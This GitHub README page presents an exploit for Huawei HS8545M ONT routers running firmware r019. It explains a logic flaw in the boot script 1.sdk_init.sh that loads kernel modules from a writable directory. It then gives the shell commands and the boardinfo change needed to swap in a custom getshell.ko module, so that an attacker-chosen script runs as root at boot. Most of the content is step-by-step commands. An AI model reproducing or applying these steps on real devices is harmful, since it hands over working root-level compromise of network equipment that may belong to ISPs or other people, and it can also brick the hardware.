Skip to content

Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.

Notifications You must be signed in to change notification settings

0neday/Exploit-HS8545M-ONT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Note

This maybe brick your ONT device, use at your own risk!

Usage

Find an exploit to load userdefined ko module

an exploit in /etc/rc.d/rc.start/1.sdk_init.sh, use kernel module .ko to run a shell script /mnt/jffs2/hw/getshell.sh when system reboot.

Logical exploit in line 200-206

# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
	  cd /mnt/jffs2/TranStar/
	  echo "Loading the Temp HISI SD511X modules: "
else
	  cd /lib/modules/hisi_sdk
	  echo "Loading the HISI SD511X modules: "
fi

if /mnt/jffs2/TranStar/hi_sysctl.ko exsit, then execute cd /mnt/jffs2/TranStar/. That means work directory is /mnt/jffs2/TranStar/ now, and /mnt/jffs2/TranStar/ is writable. so

mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/

In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

obj.id = "0x00000001" ; obj.value = "4";

Upload getshell.ko module, compiled by 0neday, only support r019

# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko

# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko

License

GPLv3.0

About

Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published